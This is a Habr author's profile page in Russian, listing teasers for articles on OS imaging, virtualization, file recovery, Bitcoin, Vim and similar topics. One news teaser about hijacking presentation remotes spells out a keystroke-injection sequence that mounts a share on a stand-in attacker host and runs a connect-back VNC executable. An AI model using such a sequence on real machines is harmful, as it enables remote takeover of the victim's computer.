Pull to refresh
26
0
Дмитрий @bbk

Пользователь

Send message

Разворачивание образов ОС при помощи FOG

Reading time10 min
Views28K

В этой статье я постараюсь вас познакомить с бесплатным продуктом FOG, который служит созданию и развертыванию образов ОС. К своему удивлению я не увидел статей на русскоязычных ресурсах, посвященных, безусловно, этому интересному продукту.
Отмечу, что я не ставлю перед собой задачу описать абсолютно все нюансы и расписать всё. Ничего не заменит ваш личный опыт. Я хочу лишь приоткрыть занавес и помочь многим системным администраторам двигаться в нужном направлении, остальное в ваших руках.
Читать дальше →
Total votes 47: ↑44 and ↓3+41
Comments17

Кластер, который всегда с собой

Reading time5 min
Views39K
lxcЗахотелось странного.
Во-первых, взгромоздить кучу виртуальных машин прямо на свой ноутбук.
А во-вторых, раскурить одну виртуализацию внутри другой.

Речь пойдет про использование контейнеров LXC, причем внутри другой виртуальной машины.

WTF! На кой это нужно?
Total votes 131: ↑126 and ↓5+121
Comments58

Вышел Proxmox VE 2.0 beta!

Reading time2 min
Views4.5K
Коллеги, у меня для вас сегодня очень хорошая новость. Вышла публичная бета второй версии великолепной свободной платформы виртуализации Proxmox VE. Если ранее Proxmox (версии 1.x) мог конкурировать с VMware при использовании в небольших компаниях, то сегодня он замахнулся как минимум на средние.

Что же такое Proxmox?


— Это свободная платформа виртуализации (Open Source, GNU AGPL v3)
— Это принцип KISS (Proxmox состоит из небольшого числа прозрачно взаимодействующих компонентов: Debian как основа, пропатченное ядро Linux, KVM и окружение Proxmox, которое включает в себя web-интерфейс, демон синхронизации и консольные утилиты управления)
— Это простая установка
— Это удобный и функциональный Web-интерфейс (без необходимости устанавливать клиент)
— Это надёжность
— Это возможность использования уже имеющихся навыков администрирования Linux, без необходимости переобучения
— Это возможность использования преимуществ Linux, которые могут быть и не предусмотрены Web-интерфейсом Proxmox VE (например DRBD)


Читать дальше →
Total votes 23: ↑21 and ↓2+19
Comments40

Обнаружена серьезная уязвимость в протоколе защиты данных WPA2

Reading time2 min
Views8.1K
image

В общем-то, более правильно было бы сказать, что протокол защиты WPA2 взломан, настолько обширную уязвимость нашли специалисты по сетевой безопасности из компании AirTight Networks. Они доказали, что протокол защиты данных WPA2, наиболее распространенный сейчас в сетях WiFi, можно взломать с целью получения любой информации из такой сети. Кроме того, специалисты утверждают, что уязвимость может помогать хакерам атаковать различные ресурсы, используя возможности взломанной сети.

Читать дальше →
Total votes 106: ↑100 and ↓6+94
Comments70

Наводим порядок после PhotoRec

Reading time3 min
Views16K
Многим известна бесплатная (Open Source) утилита PhotoRec, которая позволяет восстанавливать файлы с разных типов носителей, даже если файловая система этих носителей серьезна повреждена или даже отформатирована. На Хабре уже был топик (автор: eeexception) о том, как пользоваться этой утилитой для восстановления фотографий с карты памяти фотоаппарата после форматирования. Уже один этот случай говорит о том, что утилита серьезная несмотря на свою бесплатность. А если еще учесть то, что программа кроссплатформенная — ей просто нет цены.
image

Но есть в этой программе один минус. Если вы восстанавливаете содержимое разных типов — от текстовых документов до видео-файлов, да еще и в больших количествах, то в результате получите не очень привлекательную картину. Перед вами предстанут восстановленные файлы, перемешанные по типам и с неизвестными для вас названиями. Можно ли хоть что-то исправить в данной ситуации?
Читать дальше →
Total votes 31: ↑28 and ↓3+25
Comments9

В США впервые зарегистрировано снижение креативности (по тесту Торренса)

Reading time1 min
Views2.5K
Каждый год миллионы людей по всему миру сдают тест Торренса на креативное мышление (TTCT). Сводная статистика часто публикуется в открытых источниках и служит основой для научных публикаций.

Начиная с 1966 года, когда был изобретён TTCT, результаты американцев постоянно росли. По мнению психологов, это связано с общим усложнением окружающей жизни и появлением новых интерфейсов. Аналогичная динамика наблюдалась по тестам IQ, в связи с этим был даже сформулирован эффект Флинна: у каждого следующего поколения уровень IQ на десять пунктов выше, чем у предыдущего.

Однако, сейчас учёные всё больше склоняются к мнению, что эффект Флинна больше не действует. Ранее было обнаружено, что уровень IQ в развитых странах перестал расти в середине 90-х. А теперь и специалисты из колледжа William & Mary провели анализ 300 000 тестов Торренса и обнаружили, что коэффициент креативности (CQ) среди молодёжи в США тоже больше не растёт. Хуже того, начиная с 90-х гг он стабильно снижается, причём довольно сильно. Самую худшую динамику по TTCT показывают дети (от детского сада до шестого класса).
Total votes 51: ↑40 and ↓11+29
Comments107

Вдыхая жизнь в Avatar

Reading time8 min
Views22K
image
Хотя на Хабре уже публиковались некоторые заметки о технической стороне создания фильма Avatar, например в блоге компании HP была заметка о создании рендерфермы, построенной на blade-системах HP, мне показалось, что эта тема остается весьма любопытной для «технарей», как же там все делается «за кадром», в проектах такого масштаба, тем более, что системы NetApp непосредственно участвовали в создании фильма. Поэтому я решил перевести эксклюзивно для Хабра статью из недавно вышедшей свежей «электронной ежемесячной газеты» Tech Ontap. Кстати, можно подписаться и на русскую ее версию.

Фильм Avatar, вышедший на экраны в этом году, побил все рекорды сборов, добравшись до величины в 2.7 миллиардов долларов, и продолжая собирать кассу. Weta Digital, компания создания визуальных эффектов, занимавшаяся созданием спецэффектов и компьютерной анимации для этого фильм, также побила несколько своих собственных рекордов при создании впечатляющего 3D-мира Avatar. Weta Digital получила широкую известность в профессиональной среде после выхода трилогии «Властелин Колец» (The Lord of the Rings) и ряда последующих фильмов, таких, как King Kong и District#9, но создание Avatar потребовало совершенно особых технических усилий.
Читать дальше →
Total votes 83: ↑78 and ↓5+73
Comments55

Bitcoin (฿): пиринговая криптовалюта

Reading time1 min
Views49K
Неделю назад вышел релиз Bitcoin 0.3.0, единственной в мире полностью децентрализованной анонимной платёжной криптосистемы, которая создаётся по принципам open source. Это уникальная в своём роде валюта уже доказала, что эмиссия платёжных инструментов и контроль за их обращением возможен исключительно на основе P2P-отношений и системы криптографических ключей, без какого-либо эмиссионного центра. Таким образом, Bitcoin (฿) не может обесцениться из-за политики Центробанка какой-либо страны, как в случае с долларом, евро или любой другой «национальной» валютой.


Читать дальше →
Total votes 94: ↑83 and ↓11+72
Comments175

Организация SSH-доступа по одноразовым паролям

Reading time4 min
Views6.9K
В любой серьезной компании иногда возникает необходимость в том, чтобы сотрудник, уехавший в отпуск, срочно выполнил свои должностные обязанности. Рассмотрим ситуацию, когда компании необходим конкретный сотрудник, например, системный администратор, который в данный момент возлежит на пляже в тысяче километров от душного офиса. Допустим даже, что этот сотрудник согласен выполнить неожиданно свалившуюся ему на голову работу и на курорте есть интернет-кафе. Но вот проблема: кафе располагается в темном переулке, на его компьютерах стоят популярная ОС, трояны, кейлоггеры и прочие хактулзы, так что набирать пароль root'а от главного сервера компании на подобных машинах довольно неразумно.

Существует несколько решений этой задачи. Например, можно использовать одноразовые пароли, а именно систему s/key, использующую для генерации паролей алгоритмы md4 и md5. Об этой системе и будет рассказано далее.
Читать дальше →
Total votes 95: ↑93 and ↓2+91
Comments45

Управление памятью гостевой машины в облаке

Reading time5 min
Views1.5K
Одна из первых проблем, с которой сталкиваешься, когда решаешь сделать в облаке «неограниченную память» — это то, что современные операционные системы не готовы к «неограниченной памяти». Связано это с дисковым кешем.

Ядро забирает себе всю свободную память для кеша. Если есть дисковые операции и есть свободная память — кеш будет расти. В случае сервера с единолично пользуемой памятью это благо, однако, если мы говорим о том, что все мегабайты платные, платить за дисковый кеш в 10-20Гб откровенно не хочется.

Я пытался найти возможность ограничить размер дискового кеша для линукса, но всё, что нашёл — это странный патч 2003 года (который, разумеется, в основную ветку не взяли).

Получается, что чем больше гость работает, тем больше его ядро берёт себе памяти от (неограниченного) объёма. Результат — если не ограничивать систему вообще, то она за весьма незначительное время вырастает либо до размера дисковых устройств (спасибо, дискового кеша больше, чем размер диска, не бывает), либо до максимально доступного на платформе объёма памяти. Заметим, что в этих условиях пасуют все технологии — и компрессия памяти, и дедупликация страниц памяти (у каждой ВМ свой кеш). Эта проблема стоит перед любой системой виртуализации. Ниже описываются варианты решения с оглядкой на Xen Cloud Platform.

Читать дальше →
Total votes 12: ↑8 and ↓4+4
Comments3

Установка трояна через USB plug-and-play

Reading time1 min
Views4.3K
Канадские компьютерные инженеры обнаружили новый способ установки аппаратных троянов в систему — через USB-периферию.

Оказывается, уязвимость в протоколе USB plug-and-play позволяет любому USB-устройству выдать себя за любое другое. Таким образом, можно оснастить трояном клавиатуру, кофеварку или даже электронную сигарету, в принципе — любое USB-устройство, и оно получит полный доступ в систему.

Именно такой прибор сконструировали инженеры из Королевского военного колледжа Канады, пишет News Scientist. Они сделали USB-клавиатуру с микросхемой, которая копирует файлы с HDD и может передавать информацию азбукой Морзе с помощью встроенного в клавиатуру светодиода. Такой способ передачи информации выбран лишь для примера, в качестве альтернативы можно было использовать криптографию и отправлять файлы по электронной почте — разницы никакой нет.

Результаты свой работы исследователи опубликовали в журнале Future Generation Computer Systems (платный доступ).
Total votes 16: ↑11 and ↓5+6
Comments7

Как я стал нодой

Reading time3 min
Views7K
image
О Фидонете я знал давно. Ещё в далеком 2003 году, получив в своё распоряжение модем на 14400, первым делом я попытался подключиться к Сети Друзей. Но… Не сложилось. Потом появилось подключение к интернету, подписка в режиме read-only через NNTP, но мысль не только читать, но и писать всё равно осталась где-то в подсознании…

Год 2010. Пойнт.


И вот на дворе 2010 год. А если точнее — апрель-месяц. Появляется статья История одного пойнта, что выводит писательскую мысль из коматоза и отправляет на поиски пойнтового адреса у Сергея (2:5020/2140). И вот оно — первое сообщение и первый нетмейл!
Я сразу понял, что радость только начинается…
Читать дальше →
Total votes 168: ↑122 and ↓46+76
Comments216

Взлом компьютера через радиопульт для презентации

Reading time1 min
Views2.1K
Если вам приходится выступать с презентациями перед большой аудиторией — будьте осторожны! Хакеры нашли способ удалённого взлома радиопультов для презентаций, так что теперь любой злоумышленник может перехватить управление пультом прямо во время вашего выступления. Хуже того, через пульт можно передавать нажатия клавиш, которые будут исполнены на презентационном компьютере.

1. [Win+R]
2. net use X: http:// attacker/webdavshare
3. X:\VNCconnectback.exe
4. [enter]

Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.
Читать дальше →
Total votes 66: ↑59 and ↓7+52
Comments47

Фрактальная миграция виртуализированного центра обработки данных

Reading time5 min
Views856
imageПри выполнении задач, связанных с виртуализацией процессов вычислений, обработки данных и кластеризации таковых в единый пул, возникает необходимость плановой, либо экстренной миграции (перемещения) процессов и данных на другие физические носители без потерь. Это возможно при параллельной работе виртуального приложения и формирования виртуальных данных, как минимум, в двух независимых физических носителях. Избыточность данного метода обеспечивает минимальные задержки и минимальные потери, но не позволяет оперативно реагировать на массовые отказы системы, полностью исключая потери. Восстановление работоспособности приложения возможно только через некоторое время, которое может критически сказаться на оперативности принятия решения.
Для устранения данной проблемы, необходима разработка иного метода резервирования вычислений и операций с данными, при реализации которого будут устранены все недостатки предыдущего. Ввод математического термина «фрактал», интерпретированного в контексте с описанием процессов вычислений и оперируемых данных, позволяет применить его свойства в будущей системе.
Читать дальше →
Total votes 15: ↑10 and ↓5+5
Comments14

Электронная цифровая подпись для чайников: с чем ее есть и как не подавиться. Часть 3

Reading time6 min
Views166K
Часть 1
Часть 2

В этой части сделаем небольшое отступление от цифровых подписей в сторону того, без чего непосредственно цифровых подписей, да и защиты информации в привычном понимании, не было бы: шифрования. Ведь первое, что приходит на ум, когда идет речь о защите наших данных — это не дать эти данные нехорошему человеку прочитать. Поэтому, перед тем, как продолжить рассмотрение стандартов PGP и S/MIME, стоит закрасить некоторые остающиеся в знаниях белые пятна, и рассмотреть процесс шифрования немного поподробнее.

Читать дальше →
Total votes 50: ↑47 and ↓3+44
Comments14

Vim и кириллица: парочка приёмов

Reading time2 min
Views56K
image

Раньше для редактирования обычных русскоязычных текстов, я обычно откладывал Vim в сторонку и прибегал к помощи других редакторов. Причиной этому была парочка очень неприятных косяков:
  1. На каждый чих приходилось сто раз переключать раскладку, чтобы корректно ввести пару команд и вернуться обратно. Например, замена буквы-опечатки в только что написанном слове, выливалось в: switch → добраться до буквы, нажать r → switch → [нужная буква] → switch → A → [пишем дальше]. Ад!
  2. Штатный spell checker букву «ё» не любил и любое слово с её участием предлагал заменить на аналог через «е». А я ё люблю, меня это расстраивало.

И вот, наконец, я нашёл решение обеим проблемам. Сижу сейчас и набираю этот текст в Vim. Любопытно, что оба барьера обходятся штатными средствами, без дополнительных плагинов. Поскольку материалов на английском и на них основанных куда больше чем исконно русских, найти эту информацию мне было не просто. Поэтому хочу поделиться ей с теми кому интересно.
Читать дальше →
Total votes 111: ↑102 and ↓9+93
Comments95

iSCSI Target Box

Reading time3 min
Views21K
Хочу представить вашему вниманию интересный проект iSCSI Target Box — мини-дистрибутив Linux позволяющий быстро развернуть сервер iSCSI (т.н. Target) на любом поддерживаемом оборудовании.
Он сделан на основе Arch Linux и его скрипта генерации initrd-образов Mkinitcpio что позволяет быстро и легко его пересобрать при обновлении ядра или других его компонентов. По сути это ядро Linux + BusyBox + iSCSI Enterprise Target запакованные в Initrd-образ и вынесенные наружу необходимые файлы настроек.
Читать дальше →
Total votes 19: ↑15 and ↓4+11
Comments30
12 ...
25

Information

Rating
Does not participate
Location
Киев, Киевская обл., Украина
Registered
Activity